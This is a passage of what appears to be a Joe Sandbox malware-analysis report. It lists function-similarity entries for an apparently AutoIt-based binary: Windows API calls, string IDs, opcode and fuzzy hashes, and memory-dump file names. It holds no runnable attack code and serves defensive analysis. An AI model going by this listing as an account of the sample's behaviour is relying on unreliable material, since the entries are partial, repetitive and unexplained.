                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                        • String ID: FILE
                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                        • Opcode ID: 4b51d1c938045e712ae21feefb9ff705b44e0651198da79e0abe09b0028fa73a
                                                                                                                        • Instruction ID: f7b91429d20bd2aa6c64ff76d47877b868bebc674f40b7af01e9a1af10dc9c2f
                                                                                                                        • Opcode Fuzzy Hash: 4b51d1c938045e712ae21feefb9ff705b44e0651198da79e0abe09b0028fa73a
                                                                                                                        • Instruction Fuzzy Hash: CC41A332A1421ABADF209BA4CC81FEF7BBADF89710F00046AF601F7191D6719A45C775
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DFA668
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DFA67D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: '
                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                        • Opcode ID: 30ca4094d18144b167f0c07d2c265cb61fe6da7f4f94a05745d8a1bbd83c2311
                                                                                                                        • Instruction ID: 309835e3497d4d8f34d991b7ff042026de9ae192b5916cd65ef4dfd10f2fad44
                                                                                                                        • Opcode Fuzzy Hash: 30ca4094d18144b167f0c07d2c265cb61fe6da7f4f94a05745d8a1bbd83c2311
                                                                                                                        • Instruction Fuzzy Hash: 0741F8B5A003099FDB14CF69C881BEA7BB5FF09300F15446AEA19EB381D770A945CFA1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DE57E7
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00DE581D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                        • String ID: |
                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                        • Opcode ID: ff5883e85791329aa45f8a2cbf9be18fb5f1eb0d6c403e8bcf814c8fc49054d6
                                                                                                                        • Instruction ID: add3c641946ebb27ac14ada9c94ff0bb9f5574b34fa05e0b22314eef2ff4c9ff
                                                                                                                        • Opcode Fuzzy Hash: ff5883e85791329aa45f8a2cbf9be18fb5f1eb0d6c403e8bcf814c8fc49054d6
                                                                                                                        • Instruction Fuzzy Hash: 8D311971800219EBCF11AFA1DC95EEE7FB8FF19344F104129E816A6166DB319A06DB70
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00DF961B
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DF9657
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: aac32e0873b9b1476e03f81fe4f68d2469ceb3d01a68d1043f3a07708706ce33
                                                                                                                        • Instruction ID: 4d9c87862f03cbe62de99f2d66200e6ddb157b69a3b4d4a0f2eb9cd6ec1f6633
                                                                                                                        • Opcode Fuzzy Hash: aac32e0873b9b1476e03f81fe4f68d2469ceb3d01a68d1043f3a07708706ce33
                                                                                                                        • Instruction Fuzzy Hash: 68318D31900208AEEB109F64DC90BFBB7A9FF59764F059619F9A9D7190CA31AC81CB70
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DD5BE4
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DD5C1F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: 67fe892da5155b31cc31decda283acfd597a76d1b8ea08d58f122d692f5bbaf3
                                                                                                                        • Instruction ID: c80bfdd4f439b89954583d998a5e9998c83360e9eea4ac5fff16a0416825cdde
                                                                                                                        • Opcode Fuzzy Hash: 67fe892da5155b31cc31decda283acfd597a76d1b8ea08d58f122d692f5bbaf3
                                                                                                                        • Instruction Fuzzy Hash: 9531A731610705EBDB25CF9DE885BAEBBF5EF05350F1C401AE982962A4E7B09944CF30
                                                                                                                        APIs
                                                                                                                        • __snwprintf.LIBCMT ref: 00DE6BDD
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                        • Opcode ID: 3522db56d73eb1d0595ba3ea610c92c56e8dd0cfccf2eb7514779b6951e6feaf
                                                                                                                        • Instruction ID: 28c8c7befae1305b6d5d6b8d2257541426da0d2fb8b3bab047249e10e3e1076e
                                                                                                                        • Opcode Fuzzy Hash: 3522db56d73eb1d0595ba3ea610c92c56e8dd0cfccf2eb7514779b6951e6feaf
                                                                                                                        • Instruction Fuzzy Hash: FF215C31600218BACF11EFA5DC82EAE7BB5EF54740F104455F545AB282EB70EA42CBB1
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DF9269
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DF9274
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        • Opcode ID: 71645de1d8e45b1234f809454676545969247812aa091cc97e2dff8d4330a245
                                                                                                                        • Instruction ID: fdb0f555b55f605df7c32050d0899427f8a16e63ba2dc4a3a3a60873d1c39eea
                                                                                                                        • Opcode Fuzzy Hash: 71645de1d8e45b1234f809454676545969247812aa091cc97e2dff8d4330a245
                                                                                                                        • Instruction Fuzzy Hash: B1119371B0020CBFEF258E54DC90FBB775AEB893A4F558125FA1897290D631DC5187B4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
                                                                                                                          • Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
                                                                                                                          • Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DF9775
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00DF978F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: ea2cef8c3237f23d95354c879082e050ef36afca7531ffa447416fdfc4e74adc
                                                                                                                        • Instruction ID: e55594af4045f86fb1e01b74bc72b07bc4691eb61bc056a4aaacca8800fdc4b3
                                                                                                                        • Opcode Fuzzy Hash: ea2cef8c3237f23d95354c879082e050ef36afca7531ffa447416fdfc4e74adc
                                                                                                                        • Instruction Fuzzy Hash: A7115972520209AFDB04DFB8CC45EFA7BA8EB08314F058528FA56E3150E634E851DB60
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00DF94A6
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DF94B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        • Opcode ID: a4befd0db502248088ad97ec82988420b31eec34b0c688561cdc70e09282bf4b
                                                                                                                        • Instruction ID: 44058076c401e8414b85cd87c8cf5f6f822217dc918f8f4643053aadbd2b1dc9
                                                                                                                        • Opcode Fuzzy Hash: a4befd0db502248088ad97ec82988420b31eec34b0c688561cdc70e09282bf4b
                                                                                                                        • Instruction Fuzzy Hash: CC119D71900208AFEB108E64DC50FFB7B69EB25374F118724FA65931E0C631DC569B74
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DD5CF3
                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00DD5D12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: 7be9cf7e68e015b084f41100e074d38200af077cc64b2b3171bc889449643921
                                                                                                                        • Instruction ID: a3bf6913bed8cf00766944e8bf6327c0545725ab07f89a5389d95f31f959392f
                                                                                                                        • Opcode Fuzzy Hash: 7be9cf7e68e015b084f41100e074d38200af077cc64b2b3171bc889449643921
                                                                                                                        • Instruction Fuzzy Hash: F7118B72911618ABDB24DA6CE848F9977EAAB06344F180022ED41EB298D370ED08C7B1
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DE544C
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DE5475
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: 3e7e64054155ffa9d0cfdf5f498fb2c4cf51e1a6347d2685ff512231c41e86c2
                                                                                                                        • Instruction ID: dc8061db3935ec6fd9a732bac291ee70214abab74de4f353a29b91178be4932b
                                                                                                                        • Opcode Fuzzy Hash: 3e7e64054155ffa9d0cfdf5f498fb2c4cf51e1a6347d2685ff512231c41e86c2
                                                                                                                        • Instruction Fuzzy Hash: 6B110670541A61BADB15AF52AC84EFBFB68FF1279AF10812AF54592080E37099C0C6F0
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC4557
                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 00DC463E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 3761405300-2982846942
                                                                                                                        • Opcode ID: 4175b82d1852db89c7007cdca0e5c8787520fa08113c73ac9b6a81f4ac7455bd
                                                                                                                        • Instruction ID: 5b5835fa23f0ce2a2bcf1f229bc2ba61633cbb05b04633dc630984c2d9fa8be0
                                                                                                                        • Opcode Fuzzy Hash: 4175b82d1852db89c7007cdca0e5c8787520fa08113c73ac9b6a81f4ac7455bd
                                                                                                                        • Instruction Fuzzy Hash: 042114B5510304DFDB09DF56E9967903BB0BB48326F245C2AF904AB3A0EBF06988CF45
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: htonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                        • Opcode ID: d164b2efbebb9bca582db8189cede5d5f598ccf5b538539b9081652042b12a10
                                                                                                                        • Instruction ID: f6ebf01d5c65f72a1ebdbfd73a36b8c42eace9aaf35532541e354cc501fb38c1
                                                                                                                        • Opcode Fuzzy Hash: d164b2efbebb9bca582db8189cede5d5f598ccf5b538539b9081652042b12a10
                                                                                                                        • Instruction Fuzzy Hash: C4019275200246ABCB10AFA9DC46FADB365EF44724F10852AF5169B2D1E671F804C775
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DCC5E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: 21017723ad87d97a8c521aa70ef805206cef9308be98256b00a12d5facea1432
                                                                                                                        • Instruction ID: 40f9148d1cea40c66babc7d77cb455f531aa0ff76b6e0710eeb76537833b698e
                                                                                                                        • Opcode Fuzzy Hash: 21017723ad87d97a8c521aa70ef805206cef9308be98256b00a12d5facea1432
                                                                                                                        • Instruction Fuzzy Hash: EA01B171661219ABCB08EBA8CC52EFE7369EB42350B141B1DF562E72D1DA30A9089770
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                        • Opcode ID: 102789da74984128455772a3565e655e8bfc71ed428547202abb087557487d44
                                                                                                                        • Instruction ID: 33e50b78dffb2a2fbf45232537bac3bc0699b75856629cfc81727c9e7bfd223b
                                                                                                                        • Opcode Fuzzy Hash: 102789da74984128455772a3565e655e8bfc71ed428547202abb087557487d44
